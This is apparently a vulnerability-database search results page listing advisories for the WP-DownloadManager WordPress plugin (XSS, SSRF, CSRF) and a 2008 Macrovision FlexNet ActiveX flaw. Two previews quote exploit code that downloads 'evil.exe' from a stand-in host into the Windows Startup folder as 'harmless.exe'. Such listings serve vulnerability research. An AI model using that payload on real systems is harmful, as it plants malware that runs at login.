Lucene search
K

79 matches found

ATTACKERKB
ATTACKERKB
added 2022/01/10 1:42 p.m.6 views

CVE-2022-25606

Multiple Authenticated Stored Cross-Site Scripting XSS vulnerabilities discovered in WP-DownloadManager WordPress plugin versions = 1.68.6. Vulnerable parameters path, pathurl, pageurl, categories...

5.4CVSS5.6AI score0.00544EPSS
Exploits0References3Affected Software1
Patchstack
Patchstack
added 2022/01/10 12:0 a.m.18 views

WordPress WP-DownloadManager plugin <= 1.68.5 - Multiple Authenticated Stored Cross-Site Scripting (XSS) vulnerabilities

Multiple Authenticated Stored Cross-Site Scripting XSS vulnerabilities discovered by Ex.Mi Patchstack in WordPress WP-DownloadManager plugin versions = 1.68.5. Solution Update the WordPress WP-DownloadManager plugin to the latest available version at least 1.68.6...

5.4CVSS2.3AI score0.00544EPSS
Exploits0References2Affected Software1
WPVulnDB
WPVulnDB
added 2021/12/28 12:0 a.m.23 views

WP-DownloadManager < 1.68.7 - Reflected Cross-Site Scripting

The plugin does not sanitise and escape some parameters before outputting them back in the page, leading to Reflected Cross-Site Scripting...

5.4CVSS1.8AI score0.00523EPSS
Exploits0Affected Software1
Patchstack
Patchstack
added 2021/12/08 12:0 a.m.28 views

WordPress WP-DownloadManager plugin <= 1.68.6 - Authenticated Reflected Cross-Site Scripting (XSS) vulnerability

Authenticated Reflected Cross-Site Scripting XSS vulnerability discovered by Ngo Van Thien in WordPress WP-DownloadManager plugin versions = 1.68.6. Solution Update the WordPress WP-DownloadManager plugin to the latest available version at least 1.68.7...

5.4CVSS2.2AI score0.00523EPSS
Exploits0References2Affected Software1
NVD
NVD
added 2021/07/07 2:15 p.m.36 views

CVE-2020-24141

Server-side request forgery in the WP-DownloadManager plugin 1.68.4 for WordPress lets an attacker send crafted requests from the back-end server of a vulnerable web application via the fileremote parameter to download-add.php. It can help identify open ports, local network hosts and execute...

5.3CVSS0.00933EPSS
Exploits0References1
Prion
Prion
added 2021/07/07 2:15 p.m.27 views

Server side request forgery (ssrf)

Server-side request forgery in the WP-DownloadManager plugin 1.68.4 for WordPress lets an attacker send crafted requests from the back-end server of a vulnerable web application via the fileremote parameter to download-add.php. It can help identify open ports, local network hosts and execute...

5CVSS5.5AI score0.00933EPSS
Exploits0References1Affected Software1
Cvelist
Cvelist
added 2021/07/07 1:34 p.m.40 views

CVE-2020-24141

Server-side request forgery in the WP-DownloadManager plugin 1.68.4 for WordPress lets an attacker send crafted requests from the back-end server of a vulnerable web application via the fileremote parameter to download-add.php. It can help identify open ports, local network hosts and execute...

5.6AI score0.00933EPSS
Exploits0References1
CVE
CVE
added 2021/07/07 1:34 p.m.56 views

CVE-2020-24141

CVE-2020-24141 is a server-side request forgery (SSRF) vulnerability in the WordPress WP-DownloadManager plugin, reported for version 1.68.4. The issue arises from the file_remote parameter in download-add.php, enabling an attacker to issue crafted requests from the vulnerable site’s back-end ser...

5.3CVSS5.5AI score0.00933EPSS
Exploits0References1Affected Software1
WPVulnDB
WPVulnDB
added 2021/04/13 12:0 a.m.25 views

WP-DownloadManager < 1.68.5 - Server-Side Request Forgery (SSRF)

The plugin before version 1.68.5 is vulnerable to server-side request forgery SSRF attacks. This could allow an attacker identify open ports, network hosts and access web resources on a non-public facing network...

5CVSS4.9AI score0.00933EPSS
Exploits0References1Affected Software1
NVD
NVD
added 2013/04/19 11:44 a.m.16 views

CVE-2013-2697

Cross-site request forgery CSRF vulnerability in the WP-DownloadManager plugin before 1.61 for WordPress allows remote attackers to hijack the authentication of arbitrary users for requests that insert XSS sequences...

6.8CVSS6.7AI score0.00954EPSS
Exploits0References2
Prion
Prion
added 2013/04/19 11:44 a.m.13 views

Cross site request forgery (csrf)

Cross-site request forgery CSRF vulnerability in the WP-DownloadManager plugin before 1.61 for WordPress allows remote attackers to hijack the authentication of arbitrary users for requests that insert XSS sequences...

6.8CVSS7AI score0.00954EPSS
Exploits0References2Affected Software1
Cvelist
Cvelist
added 2013/04/19 10:0 a.m.27 views

CVE-2013-2697

Cross-site request forgery CSRF vulnerability in the WP-DownloadManager plugin before 1.61 for WordPress allows remote attackers to hijack the authentication of arbitrary users for requests that insert XSS sequences...

6.7AI score0.00954EPSS
Exploits0References2
CVE
CVE
added 2013/04/19 10:0 a.m.41 views

CVE-2013-2697

CVE-2013-2697 is a CSRF vulnerability in the WP-DownloadManager WordPress plugin prior to 1.61. The issue allows remote attackers to hijack the authentication of arbitrary users by sending requests that insert XSS sequences, as described across multiple sources. Affected product: WordPress plugin...

6.8CVSS6.8AI score0.00954EPSS
Exploits0References2Affected Software1
CVE
CVE
added 2008/10/15 10:0 p.m.47 views

CVE-2008-4587

CVE-2008-4587 describes an insecure method vulnerability in the MSVNClientDownloadManager61Lib.DownloadManager.1 ActiveX control (ISDM.exe 6.1.100.61372) of Macrovision FLEXnet Connect 6.1. An attacker could force the download and execution of arbitrary files via AddFile and RunScheduledJobs, wit...

9.3CVSS7.4AI score0.10507EPSS
Exploits0References6Affected Software1
seebug.org
seebug.org
added 2008/01/15 12:0 a.m.10 views

Macrovision FlexNet DownloadManager Insecure Methods Exploit

No description provided by source. !-- Macrovision FlexNet DownloadManager Insecure Methods Exploit Implemented Categories: Category: Safe for Scripting Written by e.b. Tested on Windows XP SP2fully patched English, IE6, ISDM.exe version 6.1.100.61372 -- html head titleMacrovision FlexNet...

7.1AI score
Exploits0
securityvulns
securityvulns
added 2008/01/15 12:0 a.m.45 views

[Full-disclosure] Macrovision FlexNet Connect DownloadManager Insecure Methods

Who: Macrovision What: Macrovision FlexNext Connect is a software package that allows ISV's to update their software products. It is generally used in conjunction with the InstallShield software deploymnet framework. FlexNet uses a number of ActiveX controls, some of which are marked safe for...

1AI score
Exploits0
0day.today
0day.today
added 2008/01/14 12:0 a.m.18 views

Macrovision FlexNet DownloadManager Insecure Methods Exploit

Exploit for unknown platform in category remote exploits ============================================================ Macrovision FlexNet DownloadManager Insecure Methods Exploit ============================================================ Macrovision FlexNet DownloadManager Insecure Methods...

7.1AI score
Exploits0
exploitpack
exploitpack
added 2008/01/14 12:0 a.m.14 views

Macrovision FlexNet DownloadManager - Insecure Methods

Macrovision FlexNet DownloadManager - Insecure Methods Macrovision FlexNet DownloadManager Insecure Methods Exploit function Check var mJob = obj.CreateJob"SomeJob",0,"11111111-1111-1111-1111-111111111111"; mJob.AddFile"http://www.evilsite/evil.exe","C:\Documents and Settings\All Users\Start...

1.5AI score
Exploits0
Exploit DB
Exploit DB
added 2008/01/14 12:0 a.m.45 views

Macrovision FlexNet DownloadManager - Insecure Methods

Macrovision FlexNet DownloadManager Insecure Methods Exploit function Check var mJob = obj.CreateJob"SomeJob",0,"11111111-1111-1111-1111-111111111111"; mJob.AddFile"http://www.evilsite/evil.exe","C:\Documents and Settings\All Users\Start Menu\Programs\Startup\harmless.exe"; mJob.SetPriority0;...

7.4AI score
Exploits0
Rows per page
Query Builder